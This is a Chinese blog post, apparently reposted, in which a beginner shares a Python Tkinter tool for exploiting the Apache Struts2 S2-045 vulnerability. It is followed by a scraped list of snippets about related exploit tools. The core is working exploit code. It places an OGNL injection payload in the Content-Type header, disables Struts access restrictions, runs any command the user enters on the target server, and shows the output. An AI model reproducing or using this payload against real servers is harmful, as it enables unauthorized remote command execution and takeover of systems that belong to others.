python S2-45 漏洞利用工具
初学python脚本,写个工具练练手。第一次写勿喷。呃...忘了截图了,补上了。
程序对于处理 JSON post 有些问题,其他地方还没发现有啥问题。
#coding:utf-8 import chardet import urllib2 import httplib from Tkinter import * from poster.encode import multipart_encode from poster.streaminghttp import register_openershttplib.HTTPConnection._http_vsn = 500 httplib.HTTPConnection._http_vsn_str = 'HTTP/1.1'class START():def __init__(self,root):self.root=rootself.show_W_Text = Text()self.show_url_ed = Label(root, text="请输入URL,例如:http://www.88.com,一定要有http://,否则报错")self.edit_url = Entry(root, text="输入地址",width = 80)self.show_cmd_ed = Label(root, text="请输入命令,例如:whoami")self.edit_cmd = Entry(root, text="输入命令",width = 80)self.butt_whois = Button(root, text="发送测试",command=self.poc)self.show_url_ed.pack()self.edit_url.pack()self.show_cmd_ed.pack()self.edit_cmd.pack()self.butt_whois.pack()self.show_W_Text.pack()def poc(self):w_url = self.edit_url.get()w_cmd = self.edit_cmd.get()text = self.show_W_Textregister_openers()datagen, header = multipart_encode({"image1":""})header["User-Agent"] = "Chrome/56.0.2924.87"header["Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+w_cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"request = urllib2.Request(w_url, datagen, headers=header)response = urllib2.urlopen(request).read()char = chardet.detect(response)["encoding"]if char == 'GB2312':response = response.decode("GBK").encode("UTF-8")else:response = response.decode(char).encode("UTF-8")text.insert(1.0, "执行结果为:\n"+response)if __name__ == '__main__':root=Tk()root.title("S2-45漏洞检测")motion=START(root)mainloop()
转载于:https://www.cnblogs.com/MiWhite/p/6535143.html
python S2-45 漏洞利用工具相关推荐
- s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)
Struts2漏洞利用工具下载(已更新V1.8版) 2017-03-21: 增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过 ...
- s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)-阿里云开发者社区...
Struts2漏洞利用工具下载(已更新V1.8版) 2017-03-21: 增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过 ...
- 部分CIA的漏洞利用工具干货请查收
3月12日讯 CIA 辛辛苦苦几年攒的漏洞和工具"被"提交事件后,业内人士和记者都在仔细查看这些文件,各方都在关注事情进展. 相关阅读: 维基解密再曝美国情报机构惊天内幕 批露CI ...
- 7. Vulnerability exploitation tools (漏洞利用工具 11个)
Metasploit于2004年发布时,将风暴带入了安全世界.它是开发,测试和使用漏洞利用代码的高级开源平台. 可以将有效载荷,编码器,无操作生成器和漏洞利用的可扩展模型集成在一起,使得Metaspl ...
- ASP.net 资源请求漏洞利用工具PadBuster
ASP.net 资源请求漏洞利用工具PadBuster 在ASP.net 网站中,为了便于部署网站项目,开发者往往会将资源(图片.Javascript文件)嵌入到dll文件中.而网页中,会使用WebR ...
- S2-045漏洞利用工具解决方案
S2-045漏洞利用工具&解决方案 参考文章: (1)S2-045漏洞利用工具&解决方案 (2)https://www.cnblogs.com/sevck/p/6516268.html ...
- WPS漏洞利用工具Bully常见命令集合
WPS漏洞利用工具Bully常见命令集合 Bully是一款利用路由的WPS漏洞来破解WiFi密码工具.相比Reaver工具,Bully提升了资源使用效率,并提供了更丰富的设置选项.
- WebDAV服务漏洞利用工具DAVTest
WebDAV服务漏洞利用工具DAVTest WebDAV是基于Web服务的扩展服务.它允许用户像操作本地文件一样,操作服务器上的文件.借助该功能,用户很方便的在网络上存储自己的文件.为了方便用户使用, ...
- Sundown EK:漏洞利用工具中的抄袭大师
简介 Sundown是目前市场上最新款的漏洞利用工具,而Sundown的作者也成功地证明了自己其实就是一个抄袭大师.不知道这种"借鸡生蛋"的事情被曝光之后,还有用户会买他的单吗? ...
- 不能执行已释放 script 的代码_[漏洞预警]CVE20190708远程桌面代码执行漏洞利用工具已放出...
漏洞描述 2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了许多版本的Windows操作系统.该漏洞在不需身份认证的情况下即可远程触发,危害与影 ...
最新文章
- 5分钟搞懂如何使用探针检查Kubernetes健康
- SAP SD销售业务中客户投诉退货的处理方案
- Outlook收不到邮件, 或者收邮件很慢, 怎么办?
- 利用Win32 Debug API打造自己的调试器Debugger
- 2.5英寸硬盘何止“五脏俱全”(硬盘构造再揭秘之四)
- MyEclipse启动tomcat出现java.lang.OutOfMemoryError: PermGen space 的解决方案
- Windows安装 ANT
- 纪念品分组java_纪念品分组 ——易懂、简介、技巧(Java代码)
- 51单片机外部中断实验 设置中断优先级寄存器,当有外部中断0请求中断时,中断程序执行发光二极管程序,在此过程中,外部中断1也有中断请求,外部中断0的中断程序将被中断去执行外部中断1的中断程序(数码管
- php访问多重数组,PHP实现删除多重数组对象属性并重新赋值的方法
- 编写可复用的自定义按钮
- [USACO08NOV]时间管理Time Management
- html中添加3dmax建模,HT for Web自定义3D模型的WebGL应用
- python27缺少dll的解决
- intel网卡驱动下载linux,intel网卡驱动下载
- 使用itext,html转pdf使用报错:java.lang.NoSuchMethodError: com.lowagie.text.pdf.BaseFont.getCharBBox(C)
- Android 静默安装
- 电脑录像,笔记本电脑录像功能_笔记本电脑 录像
- 制作Java视频播放器
- 【调剂】上海航天802所2023年研究生调剂开始啦!